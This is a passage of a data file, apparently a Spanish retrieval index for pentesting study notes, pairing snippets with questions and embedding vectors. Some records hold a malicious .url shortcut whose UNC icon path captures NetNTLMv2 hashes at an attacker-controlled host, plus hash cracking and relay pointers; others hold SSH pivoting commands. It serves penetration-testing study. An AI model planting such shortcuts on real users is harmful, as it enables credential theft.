0.04982, -0.10423, -0.04277, -0.10363, 0.00329, 0.00679, -0.08532, -0.09902, 0.07102, 0.02459, 0.05745, -0.04254, -0.05278, 0.00333, 0.08093, -0.0375, -0.05328, -0.00387, -0.02883, 0.04283, -0.05723, 0.05376, -0.10357, 0.07665, -0.02555, -0.05618, 0.04583, 0.00826, -0.09227, -0.07025, -0.01634, -0.04868, 0.08538, -0.00292, -0.00598, -0.0022, 0.00714, -0.063, -0.00459, -0.0518, 0.00789, -0.00015, 0.08722, -0.1175, -0.01678, -0.00627, 0.02982, -0.00794, -0.01819, 0.01201, 0.03392, 0.03859, -0.02588, 0.05216, 0.00071, 0.00841, -0.04316, 0.02338, 0.0333, -0.04474, -0.00985, -0.01543, 0.07904, 0.00898, -0.01185, -0.01293, -0.00337, -0.00754, 0.04298, 0.05942, -0.02197, -0.03547, -0.02639, 0.03527, -0.04419, 0.03389, 0.06483, -0.05466, 0.0045, 0.0132, 0.05116, 0.02662, -0.01365, 0.06398, -0.03904, 0.02393, 0.03337, 0.06271, 0.03168, 0.01405, 0.00135, 0.04202, 0.00988, 0.00021, -0.01739, -0.03446, -0.01421, -0.05406, -0.04444, -0.05342, -0.00273, -0.00105, -0.06022, -0.04464, 0.0415, 0.08843, -0.00805, -0.00883, 0.00805, -0.05199, -0.02525, -0.00571, 0.01297, -0.06417, -0.05491, 0.00447, 0.04374, 0.01438, -0.02445, -0.0152]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "con que programa puedo hacer el cruce de contraseΓ±as con los hash capturados en una atacada SMB", "v": [0.19165, -0.07807, -0.15939, -0.07538, -0.06658, -0.16173, -0.05848, 0.02528, -0.05302, 0.04914, -0.01961, 0.01811, -0.02507, -0.01025, 0.04524, 0.00905, 0.00358, 0.10994, 0.07338, 0.0826, 0.02708, -0.10134, -0.00677, -0.02898, 0.00988, -0.14486, -0.09145, 0.1515, -0.11084, -0.13189, -0.06007, 0.06367, 0.02607, 0.10858, 0.07306, -0.00937, -0.07749, 0.09888, 0.11591, 0.11463, 0.01857, 0.02987, -0.11195, -0.04436, -0.00037, -0.14382, 0.09005, -0.00884, -0.00069, -0.05503, 0.05832, -0.02335, -0.25015, -0.17293, -0.05971, -0.01095, 0.04329, -0.01842, -0.03277, 0.0212, -0.05965, 0.07026, 0.04148, -0.02007, -0.00161, -0.07376, 0.05183, 0.05045, -0.06024, 0.04961, 0.0912, 0.07142, -0.05055, 0.01179, -0.04318, 0.03928, -0.023, 0.06687, 0.03128, -0.02133, -0.04615, -0.12968, 0.05187, 0.02822, -0.11941, -0.00838, -7e-05, -0.02134, 0.01016, -0.08366, 0.12328, 0.08362, 0.05442, 0.07063, 0.02023, -0.07545, -0.04725, 0.01155, -0.04582, -0.01374, -0.00896, 0.02561, -0.13395, 0.15919, -0.037, 0.03388, 0.04394, 0.03525, 0.04652, -0.0214, 0.00923, -0.0111, 0.00239, -0.03439, -0.06192, -0.02311, -0.0086, -0.06071, 0.08136, -0.02249, -0.06148, -0.00716, -0.05529, 0.05537, 0.06379, 0.04545, -0.01329, 0.03353, -0.06661, -0.1164, -0.00485, 0.04182, 0.00333, -0.05112, -0.05826, -0.00375, 0.03205, -0.14032, -0.10647, -0.07348, -0.00326, 0.02197, 0.05466, 0.03689, 0.04932, 0.04814, -0.00786, -0.07108, -0.06198, 0.03874, 0.04713, 0.00098, -0.00262, 0.03007, 0.00609, 0.01784, -0.00686, -0.06177, -0.10344, 0.13997, -0.05297, -0.01119, -0.06577, 0.02467, 0.01777, 0.01873, -0.00505, 0.03082, 0.0036, 0.04315, -0.00609, 0.09104, 0.05322, -0.05946, 0.07216, -0.04905, 0.02712, -0.08115, 0.0253, -0.09284, -0.06243, 0.01745, 0.01501, 0.00309, 0.00506, -0.03415, 0.03237, 0.05745, -0.0144, -0.00031, -0.0109, -0.01251, -0.04621, 0.0745, -0.0177, -0.03946, 0.00683, 0.06842, 0.00186, -0.04775, -0.00847, 0.01469, -0.05897, -0.06829, 0.02885, 0.08769, -0.11036, 3e-05, 0.05897, 0.07707, 0.00144, 0.02081, 0.0277, -0.0641, -0.09049, -0.03024, 0.00313, 0.00249, 0.0658, 0.01319, 0.04017, 0.10027, 0.05528, 0.11161, -0.04177, -0.09773, -0.05385, 0.02561, 0.02044, 0.0066, 0.00669, 0.01586, -0.00126, 0.00554, 0.04258, 0.01593, -0.06875, -0.02764, -0.00413, -0.03427, -0.0202, 0.0135, 0.00121, 0.00356, 0.01439, 0.02071, -0.04325, -0.0053, 0.04365, -0.00167, -0.05057, 0.03453, 0.05077, 0.02757, 0.02478, 0.00379]} -{"tipo": "pregunta", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB β†’ **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder β†’ Herramientas (Γ­ndice)\n```\n- El hash capturado β†’ Cracking de contraseΓ±as (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion Β· Cracking de contraseΓ±as Β· Authentication attacks Β· OSCP MOC", "indexar": "cuales son las herramientas para realizar ataques de relΓ© de autenticaciΓ³n", "v": [0.05917, 0.07281, -0.19982, -0.06193, 0.09224, 0.02252, 0.0428, 0.05531, -0.03749, 0.09455, -0.0874, -0.1067, -0.01448, -0.14172, 0.25359, 0.084, -0.03105, -0.04416, 0.05773, -0.02353, -0.01443, -0.03597, -0.04797, 0.08717, -0.04552, 0.00962, 0.16672, 0.0314, -0.07364, -0.0204, 0.04389, 0.03094, -0.01181, -0.01829, 0.02728, -0.03268, 0.0276, 0.14435, 0.12443, 0.07363, 0.03624, -0.11601, -0.20511, 0.01881, 0.09345, 0.04474, 0.03214, -0.00284, 0.06064, 0.08497, -0.04024, 0.06088, -0.13228, -0.06378, -0.06941, -0.17502, 0.09904, -0.01827, 0.04358, -0.11694, -0.08254, 0.028, 0.01977, -0.02931, 0.07604, 0.00372, -0.03091, -0.11934, -0.0521, 0.00747, -0.01947, -0.00242, -0.04948, 0.08323, -0.04567, -0.04867, 0.01061, 0.03855, 0.042, -0.03677, -0.01122, 0.05136, -0.05482, -0.02481, -0.03822, 0.02764, 0.08505, -0.12223, -0.03283, -0.12177, 0.01761, -0.00278, 0.0243, -0.05127, 0.04794, -0.0211, 0.03295, -0.08894, 0.01159, -0.06964, 0.04332, -0.06758, 0.01533, 0.11291, 0.01334, 0.02018, -0.00504, 0.02182, -0.02431, -0.03733, -0.09723, 0.00187, -0.02733, -0.01798, 0.03792, -0.01101, -0.09978, -0.05918, 0.04708, -0.08624, -0.05253, -0.02451, -0.00202, 0.03178, -0.00066, 0.06222, -0.05376, -0.03157, 0.04985, -0.1161, 0.00946, -0.03813, 0.04589, -0.07666, -0.10572, -0.02279, 0.02957, -0.16517, -0.06012, -0.06532, 0.06123, 0.05963, -0.02343, -0.06628, 0.11208, 0.02901, -0.0325, -0.02616, -0.12978, 0.00164, -0.01871, 0.00642, 0.05844, 0.05507, -0.0554, 0.01067, -0.06836, -0.02486, -0.01706, 0.08266, 0.01485, -0.00907, -0.05085, -0.00812, -0.02291, -0.01029, -0.03499, 0.05874, 0.13469, 0.02018, 0.01513, 0.07115, 0.03454, -0.04413, 0.01067, -0.01227, -0.05163, -0.1092, 0.03867, -0.11236, -0.02811, -0.01684, -0.04462, 0.04535, 0.01263, 0.0001, 0.06901, -0.03667, 0.03747, 0.07279, -0.0004, -0.0229, -0.03478, 0.02174, 0.09496, -0.01927, -0.07782, -0.0376, 0.01379, -0.01987, -0.00151, -0.03568, -0.04821, -0.10033, 0.04531, 0.06089, -0.01705, -0.10538, -0.00361, 0.06, 0.05148, -0.05316, 0.08259, -0.07771, -0.05876, -0.00241, -0.00053, -0.01925, -0.01431, 0.04281, 0.04446, -0.0204, 0.02208, 0.04471, -0.04851, -0.01314, -0.0284, -0.06339, 0.02319, -0.00468, 0.04772, -0.0275, -0.02737, -0.04459, 0.01126, -0.00484, 0.03812, 0.02198, -0.03632, -0.0067, -0.0052, 0.02315, -0.00288, -0.03439, -0.09588, 0.0032, -0.07966, 0.01335, -0.03104, -0.0838, -0.02466, 0.03872, 0.01274, 0.02394, 0.02719, -0.04526]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "que programa sirve para reenviar puertos y montar proxies?", "v": [0.15058, -0.10853, -0.21746, -0.09698, 0.05361, -0.04239, 0.22938, -0.13201, -0.03446, -0.17323, 0.02385, 0.07173, 0.175, -0.12888, 0.05225, 0.0316, -0.01011, 0.01617, 0.1008, 0.09715, -0.08904, 0.01755, -0.04643, -0.07008, 0.06117, 0.12834, 0.09831, -0.05147, -0.07588, 0.01748, 0.02436, 0.08294, 0.06854, -0.02599, -0.03953, -0.17187, 0.0307, 0.00781, 0.06442, 0.05415, 0.08351, -0.10408, -0.03929, 0.01206, 0.06552, -0.0392, 0.00615, -0.03323, 0.02481, -0.01496, 0.04045, 0.04629, -0.05856, 0.07947, -0.04088, -0.07983, -0.07099, -0.05816, -0.05821, -0.07376, 0.01289, 0.06788, -0.05079, -0.0778, 0.03103, -0.0721, -0.01013, 0.06446, -0.18462, -0.04724, -0.04567, -0.06396, 0.06647, 0.02254, -0.08275, -0.05695, -0.00489, -0.01467, 0.04901, 0.05264, 0.00886, -0.03499, 0.00777, 0.06063, -0.032, 0.032, -0.07472, -0.02394, 0.05229, -0.05833, -0.00372, 0.06097, 0.01442, 0.08242, 0.08305, -0.09003, 0.10817, 0.10107, 0.00747, 0.00228, 0.05774, -0.01545, -0.06072, 0.07022, -0.01966, 0.06367, 0.06136, -0.06556, 0.02787, 0.07682, 0.09584, 0.01906, -0.02795, -0.09163, -0.06846, -0.01342, -0.0201, -0.06787, 0.05351, 0.0244, -0.04986, -0.01241, -0.01947, 0.08527, -0.01335, 0.03536, 0.06249, 0.12889, 0.014, 0.0648, 0.04361, -0.00864, -0.0008, -0.04071, -0.06802, -0.1203, 0.07961, -0.07531, -0.04316, -0.04607, 0.02349, 0.06486, -0.02413, 0.0162, -0.02936, 0.05624, 0.06007, -0.03526, 0.01453, 0.0096, 0.05025, 0.11193, 0.00753, 0.02106, -0.08821, -0.01303, 0.10225, -0.00341, -0.00061, 0.07124, -0.01303, -0.0158, -0.04109, -0.07642, 0.08994, -0.06701, -0.051, -0.00414, 0.11138, 0.08858, -0.02525, 0.07424, 0.00337, -0.09082, 0.01063, 0.06861, 0.00358, -0.04647, -0.00727, 0.00096, -0.08838, 0.04852, 0.04645, 0.04108, -0.06837, -0.04655, -0.03635, -0.00208, -0.00279, 0.03562, -0.0188, -0.01857, -0.03212, 0.02423, 0.0116, -0.01293, -0.03171, 0.0433, 0.03107, -0.01303, 0.06148, 0.01045, 0.0413, -0.0078, 0.04326, 0.08499, -0.03596, 0.01705, 0.07552, 0.10394, -0.02487, -0.01967, 0.00148, 0.0153, -0.02131, -0.03362, 0.01488, 0.0829, 0.0328, 0.12699, -0.07403, 0.03372, -0.00763, 0.06889, -0.00222, -0.0229, 0.05301, 0.08099, 0.04385, 0.02093, 0.01347, -0.04734, -0.01743, -0.03013, -0.02119, -0.01003, -0.00012, 0.01237, 0.01962, -0.05254, 0.01235, 0.00719, 0.00511, -0.07061, 0.03098, -0.03475, -0.02013, 0.02676, 0.04798, 0.02971, -0.05502, 0.05603, -0.04104, -0.04388, -0.0034, -0.01548]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "con que puedo acceder a redes internas desde fuera de forma segura?", "v": [-0.05505, 0.06111, -0.19722, -0.00041, 0.05109, 0.01771, -0.14602, -0.05512, -0.1492, -0.13399, -0.04877, -0.04398, 0.02105, -0.08353, 0.08621, 0.04816, 0.02996, 0.09607, 0.11737, -0.0452, 0.05193, -0.06317, -0.01846, -0.07648, -0.02115, -0.04465, 0.02466, 0.06074, -0.06414, -0.0892, -0.03439, -0.03459, 0.07727, 0.017, -0.09334, 0.00519, -0.02192, 0.17819, 0.01888, -0.0353, 0.00082, 0.04128, -0.05088, -0.03061, 0.10934, 0.07873, -0.08128, -0.07085, 0.01127, -0.07135, -0.09367, -0.10997, -0.11341, -0.14588, -0.15425, -0.08392, 0.14853, -0.07871, -0.00991, -0.00107, -0.04241, 0.00759, -0.01961, 0.08945, 0.06229, -0.00694, 0.05551, 0.05919, -0.03044, 0.02612, 0.04116, 0.00087, -0.04837, -0.01456, 0.0062, 0.0375, -0.09874, 0.0625, 0.05335, 0.10699, -0.06056, 0.04158, -0.02015, -0.00572, -0.07241, -0.04984, 0.01686, -0.08058, -0.0307, -0.06376, 0.0726, -0.01884, -0.06446, 0.02056, -0.12303, -0.02362, -0.09257, -0.04062, -0.09471, -0.09032, -0.07883, 0.03863, -0.03854, 0.08294, -0.02984, -0.00832, -0.00319, -0.02351, 0.08187, -0.09105, 0.00696, 0.07009, -0.12139, -0.05289, -0.00793, 0.09772, -0.12675, 0.03461, 0.01852, 0.00424, -0.04132, -0.10439, -0.03212, -0.03894, 0.05476, -0.00146, -0.04844, 0.08613, 0.00513, -0.05209, -0.02388, 0.07236, -0.03375, -0.07181, -0.00129, -0.0691, -0.12305, -0.09251, -0.02687, -0.0734, -0.00277, -0.0252, -0.01725, -0.09683, 0.02626, 0.04683, -0.02219, -0.12325, -0.07192, 0.00239, 0.0012, 0.06772, -0.07005, 0.04538, -0.03045, 0.11358, -0.06931, -0.10242, 0.00482, 0.10805, 0.02389, 0.05439, -0.00933, -0.01554, -0.02482, 0.02792, -0.08353, -0.05867, 0.03808, 0.02455, -0.09209, 0.10319, -0.01814, -0.07852, -0.03807, -0.0149, -0.10635, -0.03653, 0.02608, 0.00844, -0.07355, -0.02529, -0.04876, -0.04905, -0.04036, -0.0398, 0.04557, 0.03265, -0.01055, 0.03346, -0.01992, 0.03092, 0.02715, 0.08347, 0.0206, -0.08484, -0.02854, 0.03602, 0.01895, -0.02426, -0.07759, -0.04084, 0.01151, -0.0435, 0.0193, 0.00523, -0.05511, 0.02057, -0.00328, 0.05698, 0.08132, -0.05252, 0.06269, -0.03434, -0.03381, -0.02213, 0.0757, -0.03716, -0.01966, 0.04007, 0.02511, 0.02275, 0.05853, 0.00216, 0.02137, 0.00987, -0.04595, -0.00747, -0.01135, -0.03978, 0.06123, -0.01998, -0.02057, -0.03448, 0.04982, -0.03781, 0.00091, -0.03098, -0.05677, -0.02443, -0.02049, 0.05072, -0.05684, 0.03678, -0.01102, -0.07816, -0.14466, 0.04254, -0.00436, -0.0764, -0.04628, 0.02763, 0.0731, 0.01399, 0.05621, -0.07282]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "cual es una alternativa libre a las herramientas de pivoteo como ligolo-ng?", "v": [0.00926, -0.01439, -0.15314, 0.04773, 0.03375, -0.11289, -0.03161, -0.08257, -0.17664, -0.11758, 0.06671, -0.12505, -0.00773, 0.01586, 0.14797, -0.0951, 0.05203, -0.11908, 0.00024, -0.09741, -0.15376, 0.12578, -0.07363, -0.03668, 0.03747, -0.01671, 0.13793, 0.06407, -0.20045, 0.17754, -0.04982, 0.05175, 0.07895, -0.09451, 0.05348, -0.01276, 0.17139, 0.13044, 0.08771, 0.06204, 0.03194, -0.0903, -0.03321, 0.06488, 0.00585, -0.17014, -0.09004, 0.05532, 0.04031, 0.12476, -0.00129, 0.01833, -0.0374, -0.04296, 0.09182, -0.04306, 0.20454, -0.09, 0.00445, -0.10969, -0.11413, 0.00278, 0.04316, -0.02687, -0.07753, 0.02855, -0.0979, -0.06206, -0.07423, 0.06487, -0.00082, 0.01385, 0.06697, 0.04244, -0.0782, 0.0572, -3e-05, 0.02172, 0.01195, 0.0289, 0.00974, -0.00199, 0.01808, 0.03558, -0.08807, -0.06898, 0.07269, 0.00506, 0.01821, 0.00869, 0.02829, 0.03876, 0.03203, 0.10537, 0.00464, -0.02655, -0.04284, 0.07419, 0.06789, -0.02682, 0.09648, 0.03083, -0.11366, -0.02665, 0.05332, -0.01285, -0.05667, 0.05775, -0.1052, 0.06274, 0.00244, 0.07938, 0.04911, 0.02395, 0.08674, 0.01575, -0.04756, -0.0373, 0.01025, -0.06171, 0.05952, -0.01507, 0.02446, -0.06634, -0.00323, 0.02553, 0.01035, 0.02805, 0.01254, 0.02952, 0.06447, -0.06192, -0.12689, -0.03898, -0.09245, -0.08694, 0.15612, -0.0212, 0.00835, -0.00602, 0.0128, 0.04357, -0.01164, -0.05682, 0.05432, -0.03351, -0.01479, -0.05273, -0.04217, -0.04826, -0.06945, 0.03784, 0.00455, 0.12624, -0.07479, -0.0195, -0.07126, 0.03758, -0.06577, 0.08038, 0.01139, -0.08292, 0.06052, -0.01524, 0.00876, 0.0006, 0.0274, -0.02921, 0.006, -0.04578, -0.01016, 0.07645, 0.04767, -0.03426, -0.01986, -0.07836, -0.00563, -0.03029, -0.04743, -0.02136, 0.02335, 0.03187, -0.10223, -0.02136, -0.00605, -0.01719, 0.00648, -0.01112, 0.03662, 0.02952, -0.04938, 0.00851, -0.05852, -0.10136, 0.01748, 0.0085, -0.01404, -0.02211, 0.0019, 0.0046, -0.04078, -0.00013, -0.02621, -0.04172, -0.0504, 0.00255, -0.0721, -0.00853, 0.00685, 0.03614, 0.07056, -0.01501, 0.06119, 0.00441, -0.00136, -0.03293, -0.03048, -0.02288, -0.02117, 0.00128, 0.03558, 0.00782, 0.06114, -0.03843, -0.06232, 0.01621, 0.02418, 0.05617, -0.01799, 0.00949, 0.02574, -0.02435, 0.01058, 0.00194, 0.00313, -0.03147, 0.04088, 0.01278, 0.00129, -0.00514, 0.06617, 0.03905, -0.00286, -0.03374, -0.04945, 0.01332, -0.04967, -0.03267, -0.02995, -0.0495, -0.01106, 0.06232, 0.03081, -0.02298, 0.02696, 0.01352]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "con quΓ© puedo hacer un proxy SSH local para acceder a servicios internos", "v": [0.04746, 0.05869, -0.26988, 0.00328, 0.08046, -0.12947, 0.01971, -0.15825, -0.09829, 0.04689, -0.13324, 0.06429, 0.12136, -0.2071, -0.03292, 0.02833, 0.09521, -0.02967, -0.03778, 0.17029, -0.02755, 0.04611, -0.08671, 0.01533, 0.00867, -0.03721, 0.07385, -0.00119, -0.07285, -0.0471, -0.10477, -0.07097, 0.02309, 0.029, 0.00899, -0.02418, 0.02184, 0.18162, 0.08856, -0.01032, 0.08965, -0.05661, -0.0623, 0.01997, 0.10923, -0.02794, -0.02298, -0.07014, -0.01946, 0.06038, -0.12247, -0.14718, -0.17282, -0.03329, -0.08718, 0.03947, 0.00551, -0.21404, -0.07811, -0.04645, -0.11503, -0.00403, -0.01987, 0.03635, 0.08483, -0.04337, 0.02708, 0.10335, -0.02776, 0.06511, -0.11649, -0.03922, 0.04318, -0.1102, -0.08927, 0.02096, -0.06855, -0.02444, 0.06911, -0.0025, -0.02111, 0.05836, -0.00168, -0.02308, -0.07612, -0.04024, -0.08155, -0.09672, 0.12553, -0.102, 0.08724, 0.03597, 0.01882, 0.06704, -0.07055, 0.05615, -0.03242, -0.04342, -0.08169, -0.07102, 0.01713, -0.0141, -0.05613, 0.13593, 0.00115, -0.02542, -0.02282, 0.04737, 0.02882, -0.0006, 0.07305, -0.00835, -0.08106, -0.02929, -0.02834, -0.02313, -0.08285, 0.04944, 0.00613, 0.05206, -0.06988, -0.10459, -0.04759, -0.01821, -0.06461, -0.01667, 0.02458, 0.0001, -0.03591, 0.04673, 0.05437, -0.05944, 0.02872, -0.09617, 0.05387, -0.00394, 0.07718, -0.11637, 0.03166, -0.00849, -0.00731, -0.10037, 0.0202, 0.03597, -0.04113, 0.02364, 0.00062, -0.00493, -0.04848, -0.01286, -0.0188, -0.00762, -0.05999, 0.03507, -0.07281, -0.00025, 0.00253, -0.12259, 0.06034, 0.07471, 0.03086, -0.01684, 0.0045, 0.04941, -0.04494, -0.00805, -0.026, -0.03966, 0.02631, 0.02623, -0.09275, 0.08455, 0.00815, -0.14781, 0.02254, -0.00409, -0.07362, -0.0602, 0.05381, 0.00265, 0.02233, -0.00914, -0.0217, -0.01599, -0.03282, 0.03004, 0.01799, -0.02325, 0.00978, 0.03987, -0.06691, -0.0039, 0.00366, 0.05945, 0.01486, -0.03624, -0.00679, -0.0034, -0.04991, -0.04755, -0.0768, -0.02188, -0.0333, 0.00118, 0.01609, 0.00763, 0.01858, 0.0253, 0.00509, 0.08403, 0.03283, -0.00369, 0.06936, 0.03392, -0.00898, 0.03814, 0.02547, -0.06409, 0.00026, 0.0352, -0.01309, 0.00841, 0.0305, -0.00592, 0.02078, -0.0019, 0.05398, -0.02146, 0.02458, 0.0637, 0.01364, -0.0022, -0.01936, -0.00297, 0.0192, -0.01492, -0.01384, -0.01907, 0.03003, 0.00945, -0.01064, 0.03726, -0.04074, 0.02429, -0.00534, -0.02681, -0.06526, 0.0001, 0.0102, -0.01297, -0.00801, 2e-05, -0.01374, 0.02816, 0.04946, 0.03588]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "cΓ³mo exponer un servicio remoto como RDP a travΓ©s de mi red usando SSH", "v": [0.02983, -0.07952, -0.19986, -0.12219, 0.14034, 0.02577, -0.04177, -0.10675, 0.00824, 0.03348, -0.20513, -0.12972, 0.04988, -0.26081, 0.10379, -0.03995, -0.02096, 0.10429, -0.06486, 0.05655, 0.06026, -0.05047, -0.04556, 0.03393, 0.10356, 0.01207, 0.11558, -0.00138, -0.0159, 0.05364, 0.08858, -0.00749, -0.07357, -0.05913, -0.09951, -0.04939, 0.03859, 0.09212, 0.03208, 0.00477, 0.04372, -0.04807, -0.08144, -0.0102, 0.07383, 0.03669, -0.03071, -0.03329, -0.06324, 0.10939, -0.11224, 0.01947, -0.23897, -0.0461, -0.03729, 0.02071, 0.10044, -0.03031, 0.01608, 0.05928, 0.03842, -0.04236, -0.04505, 0.07479, 0.04882, -0.17931, -0.10111, -0.01993, -0.11956, 0.0614, -0.0927, -0.01431, -0.01836, 0.02071, 0.03109, 0.01705, -0.08572, -0.04538, 0.09196, -0.05544, -0.08979, -0.03031, -0.09767, 0.10425, -0.12229, -0.06876, 0.12352, -0.06048, -0.03286, -0.06328, -0.00365, 0.00779, 0.04331, 0.02574, 0.00673, -0.05122, 0.002, -0.00812, -0.01617, -0.05447, 0.03843, 0.09429, -0.04565, 0.01469, -0.00053, -0.00888, 0.13137, -0.06862, 0.01584, -0.02638, -0.01062, -0.04586, 0.00496, -0.106, -0.01714, -0.10501, -0.0255, -0.07476, -0.01732, -0.03489, -0.04349, -0.00844, 0.04418, -0.03731, 0.05109, -0.06195, -0.07361, -0.00026, -0.02909, 0.01159, -0.01274, 0.06964, -0.03652, -0.0748, 0.05099, -0.00699, -0.02844, -0.05743, 0.029, -0.08002, 0.00986, -0.00301, 0.0516, -0.05748, 0.06288, 0.05164, 0.04285, -0.10122, -0.05237, 0.0591, 0.00616, -0.02965, -0.04019, 0.02141, -0.03597, 0.0148, -0.00552, -0.11897, -0.04307, 0.08432, -0.05912, -0.06706, 0.03884, -0.01668, 0.03459, -0.02344, 0.00465, -0.02221, 0.0599, -0.03481, -0.05581, 0.05945, -0.02269, -0.04749, -0.00371, -0.07348, -0.05458, -0.0768, 0.00871, -0.03719, -0.01547, -0.01849, -0.0279, -0.00305, 0.00333, 0.00558, -0.01037, -0.05285, 0.05161, -0.05143, -0.027, -0.00379, 0.02332, 0.03008, 0.02719, -0.01284, -0.03328, -0.06796, 0.02994, -0.00646, -0.12038, -0.0124, -0.01162, -0.05688, 0.0133, 0.00285, 0.00978, 0.1102, -0.07419, 0.06593, 0.06309, -0.01521, 0.10089, -0.05631, -0.04656, -0.00615, 0.01567, -0.03312, 0.0222, -0.01133, 0.02928, -0.00301, -0.01231, -0.0059, -0.04739, 0.02263, 0.06276, 0.01687, 0.03293, -0.02454, 0.03824, 0.01481, 0.03405, -0.02115, 0.02631, -0.03331, 0.05265, -0.00277, -0.03529, -0.05805, 0.07007, 0.05884, -0.04867, -0.02918, 0.01373, -0.03105, -0.12784, 0.03085, 0.0243, -0.03675, 0.0065, 0.03452, 0.03278, -0.04124, 0.01847, -0.02731]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "quΓ© comando SSH crea un proxy SOCKS dinΓ‘mico para navegar", "v": [0.06448, -0.04602, -0.28234, 0.0243, 0.02213, -0.19471, -0.00999, -0.03999, -0.03496, 0.02647, -0.0838, -0.01813, 0.00051, -0.3184, -0.03743, 0.11042, 0.06736, -0.08558, -0.13416, 0.18201, 0.04211, -0.02799, 0.03416, -0.04602, 0.15541, -0.07493, 0.05803, -0.00277, -0.09096, -0.04485, -0.08787, 0.14308, 0.10781, 0.01437, 0.0167, -0.04881, -0.05487, -0.02228, 0.10535, 0.09541, -0.06335, -0.06586, -0.15768, 0.07078, 0.03327, 0.00328, 0.01854, -0.1453, 0.00561, -0.00336, -0.00609, 0.02135, -0.12732, 0.0941, -0.01607, 0.05558, 0.08878, -0.16005, -0.00312, -0.10003, -0.04374, -0.04579, 0.0665, 0.00717, 0.05305, -0.08578, -0.01623, -0.10784, -0.0156, 0.0024, -0.06022, -0.0366, -0.00456, 0.02534, 0.04785, 0.07615, 0.036, -0.00585, 0.14726, -0.04988, 0.00547, -0.00828, -0.08754, 0.00108, -0.12974, -0.0797, -0.0649, -0.06593, -0.02233, -0.00686, 0.061, 0.03406, 0.03798, 0.03009, -0.00029, -0.00111, -0.0132, -0.04019, 0.06865, 0.01693, -0.0253, 0.01773, -0.09367, 0.0854, 0.03046, 0.06918, 0.04025, -0.04558, -0.01376, 0.0292, 0.00895, -0.03926, 0.05861, -0.06948, 0.03821, -0.01858, -0.08584, -0.07095, 0.02433, 0.02239, -0.098, -0.05732, -0.04828, 0.02145, 0.00967, 0.01075, -0.07414, 0.00369, 0.04742, 0.00892, 0.02771, -0.01903, -0.00173, -0.0345, -0.02398, 0.09104, 0.00653, -0.04659, -0.0184, -0.14731, -0.02456, 0.04494, -0.04069, 0.0089, 0.0034, 0.0421, 0.08003, 0.02269, -0.07106, 0.02656, 0.03072, 0.07011, -0.06628, 0.00323, -0.00944, 0.0622, -0.03264, -0.07562, -0.04928, 0.0062, 0.00607, -0.01816, 0.00217, 0.08938, 0.05936, -0.07215, -0.05999, -0.00926, 0.00205, 0.0132, -0.05268, 0.06676, 0.02261, -0.05088, -0.02909, -0.07109, -0.00403, -0.04184, -0.01286, -0.0044, -0.01256, 0.02379, 0.02931, 